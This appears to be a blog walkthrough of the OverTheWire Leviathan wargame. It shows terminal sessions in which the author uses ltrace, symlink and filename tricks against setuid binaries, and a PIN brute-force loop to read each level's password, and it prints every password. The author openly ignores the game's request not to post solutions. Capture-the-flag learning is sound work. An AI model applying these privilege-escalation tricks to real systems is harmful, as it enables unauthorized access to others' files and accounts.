30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Leviathan

6 years ago n0w4n

Location

http://overthewire.org/wargames/leviathan/

Introduction

Dare you face the lord of the oceans?
Leviathan is a wargame that has been rescued from the demise of intruded.net, previously hosted on leviathan.intruded.net. Big thanks to adc, morla and reth for their help in resurrecting this game!
What follows below is the original description of leviathan, copied from intruded.net:
Summary:
Difficulty: 1/10
Levels: 8
Platform: Linux/x86
Author:
Anders Tonfeldt
Special Thanks:
We would like to thank AstroMonk for coming up with a replacement idea for the last level,
deadfood for finding a leveljump and Coi for finding a non-planned vulnerability.
Description:
This wargame doesn’t require any knowledge about programming – just a bit of common
sense and some knowledge about basic *nix commands. We had no idea that it’d be this
hard to make an interesting wargame that wouldn’t require programming abilities from
the players. Hopefully we made an interesting challenge for the new ones.
Leviathan’s levels are called leviathan0, leviathan1, … etc. and can be accessed on leviathan.labs.overthewire.org through SSH.
To login to the first level use:
Username: leviathan0
Passowrd: leviathan0
Data for the levels can be found in the homedirectories. You can look at /etc/leviathan_pass for the various level passwords.

Level 0 –> 1

leviathan0@melinda:~$ ls -lah
total 24K
drwxr-xr-x   3 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
drwxr-x---   2 leviathan1 leviathan0 4.0K Oct 14 14:27 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
leviathan0@melinda:~$ ls -lah ./.backup
total 140K
drwxr-x--- 2 leviathan1 leviathan0 4.0K Oct 14 14:27 .
drwxr-xr-x 3 root       root       4.0K Nov 14  2014 ..
-rw-r----- 1 leviathan1 leviathan0 131K Nov 14  2014 bookmarks.html
leviathan0@melinda:~/.backup$ cat bookmarks.html | grep password
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>

Level 1 –> 2

leviathan1@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan2 leviathan1 7.4K Nov 14  2014 check

Looks like an ELF. When I execute it, it asks for a password.

leviathan1@melinda:~$ ./check
password: test
Wrong password, Good Bye ...

I use ltrace to see what is happening behind the scenes.

leviathan1@melinda:~$ ltrace ./check
__libc_start_main(0x804852d, 1, 0xffffd7a4, 0x80485f0 <unfinished ...>
printf("password: ")                             = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642password:
)     = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642
)     = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642
)     = 10
strcmp("\n\n\n", "sex")                          = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)             = 29
+++ exited (status 0) +++

strcmp is run against string sex. When I enter that as password, I get a shell.

leviathan1@melinda:~$ ./check
password: sex
$ id
uid=12001(leviathan1) gid=12001(leviathan1) euid=12002(leviathan2) groups=12002(leviathan2),12001(leviathan1)
$ find / -group leviathan2 2>/dev/null
/etc/leviathan_pass/leviathan2
/run/user/12002
/home/leviathan2/printfile
/sys/fs/cgroup/systemd/user/12002.user/124352.session
/sys/fs/cgroup/systemd/user/12002.user/124352.session/tasks
/sys/fs/cgroup/systemd/user/12002.user/124352.session/cgroup.procs
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta

Level 2 –> 3

leviathan2@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan3 leviathan2 7.4K Nov 14  2014 printfile
leviathan2@melinda:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename
leviathan2@melinda:~$ ltrace ./printfile
__libc_start_main(0x804852d, 1, 0xffffd794, 0x8048600 <unfinished ...>
puts("*** File Printer ***"*** File Printer ***
)                     = 21
printf("Usage: %s filename\n", "./printfile"Usage: ./printfile filename
)    = 28
+++ exited (status 255) +++
leviathan2@melinda:~$ ./printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Bummer.

leviathan2@melinda:~$ ltrace ./printfile /etc/leviathan_pass/leviathan3
__libc_start_main(0x804852d, 2, 0xffffd774, 0x8048600 <unfinished ...>
access("/etc/leviathan_pass/leviathan3", 4)      = -1
puts("You cant have that file..."You cant have that file...
)               = 27
+++ exited (status 1) +++
leviathan2@melinda:/tmp/31337$ ltrace ~/printfile ./n13mant
__libc_start_main(0x804852d, 2, 0xffffd754, 0x8048600 <unfinished ...>
access("./n13mant", 4)                           = 0
snprintf("/bin/cat ./n13mant", 511, "/bin/cat %s", "./n13mant") = 18
system("/bin/cat ./n13mant" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 0
+++ exited (status 0) +++

First function that is called is access which checks if the file is there.
Then it calls cat. I need to get access to continue and trick it into opening the desired file, which is in this case the file with the password. For this I create a symbolic link and create a file with a similar name in the first half part.

leviathan2@melinda:/tmp/31337$ ln -s /etc/leviathan_pass/leviathan3 ./open
leviathan2@melinda:/tmp/31337$ touch open\ file
leviathan2@melinda:/tmp/31337$ ~/printfile ./open\ file
Ahdiemoo1j
/bin/cat: file: No such file or directory

 Level 3 –> 4

leviathan3@melinda:~$ ls -lah
total 32K
drwxr-xr-x   2 root       root       4.0K Mar 21  2015 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan4 leviathan3 9.8K Mar 21  2015 level3
leviathan3@melinda:~$ ./level3
Enter the password> 12345
bzzzzzzzzap. WRONG
leviathan3@melinda:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd7a4, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                       = -1
printf("Enter the password> ")                   = 20
fgets(Enter the password> kakaka
"kakaka\n", 256, 0xf7fcac20) = 0xffffd59c
strcmp("kakaka\n", "snlprintf\n") = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
) = 19
+++ exited (status 0) +++

Looks like snlprintf is the correct string to use.

leviathan3@melinda:~$ ./level3
Enter the password> snlprintf
[You've got shell]!
$ whoami
leviathan4
$ cat /etc/leviathan_pass/leviathan4
vuH0coox6m

 Level 4 –> 5

leviathan4@melinda:~$ ls -lah
total 24K
drwxr-xr-x   3 root root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root root        675 Apr  9  2014 .profile
dr-xr-x---   2 root leviathan4 4.0K Nov 14  2014 .trash
leviathan4@melinda:~$ cd .trash
leviathan4@melinda:~/.trash$ ls -lah
total 16K
dr-xr-x--- 2 root       leviathan4 4.0K Nov 14  2014 .
drwxr-xr-x 3 root       root       4.0K Nov 14  2014 ..
-r-sr-x--- 1 leviathan5 leviathan4 7.3K Nov 14  2014 bin
leviathan4@melinda:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
leviathan4@melinda:~/.trash$ ltrace ./bin
__libc_start_main(0x80484cd, 1, 0xffffd784, 0x80485c0 <unfinished ...>
fopen("/etc/leviathan_pass/leviathan5", "r") = 0
+++ exited (status 255) +++

So the password is converted into binary. For decoding it, I use this site.
pass5

Level 5 –> 6

leviathan5@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan6 leviathan5 7.5K Nov 14  2014 leviathan5
leviathan5@melinda:~$ ./leviathan5
Cannot find /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd794, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                      = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                = 26
exit(-1 <no return ...>
+++ exited (status 255) +++

The file is looking for /tmp/file.log which is missing. To see what the program wants I create the wanted file.

leviathan5@melinda:~$ touch /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd794, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                      = 0x804b008
fgetc(0x804b008)                                 = '\377'
feof(0x804b008)                                  = 1
fclose(0x804b008)                                = 0
getuid()                                         = 12005
setuid(12005)                                    = 0
unlink("/tmp/file.log")                          = 0
+++ exited (status 0) +++

So it wants to open the file and read the content. To get the password for the next level I’m going to make a symbolic link to the desired password file and let ./leviathan5 read it for me.

leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@melinda:~$ ./leviathan5
UgaoFee4li

 Level 6 –> 7

leviathan6@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan7 leviathan6 7.4K Nov 14  2014 leviathan6
leviathan6@melinda:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
leviathan6@melinda:~$ ./leviathan6 1234
Wrong

It wants a 4 number pin.

leviathan6@melinda:~$ for x in $(seq -w 0000 9999); do ./leviathan6 $x | echo $x; done > /tmp/n13mant_0001/code

When I check the file named ‘code’ I can see that the file hangs on ‘7123’. When I enter this pincode I get another shell, this time as leviathan7. Time for the last password.

leviathan6@melinda:~$ ./leviathan6 7123
$ id
uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9

 Level 7

leviathan7@melinda:~$ pwd
/home/leviathan7
leviathan7@melinda:~$ ls -lah
total 24K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 172 root       root       4.0K Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r--r-----   1 leviathan7 leviathan7  178 Nov 14  2014 CONGRATULATIONS
leviathan7@melinda:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.
(Please don't post writeups, solutions or spoilers about the games on the web. Thank you!)

Oops…….sorry for ignoring that request.
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.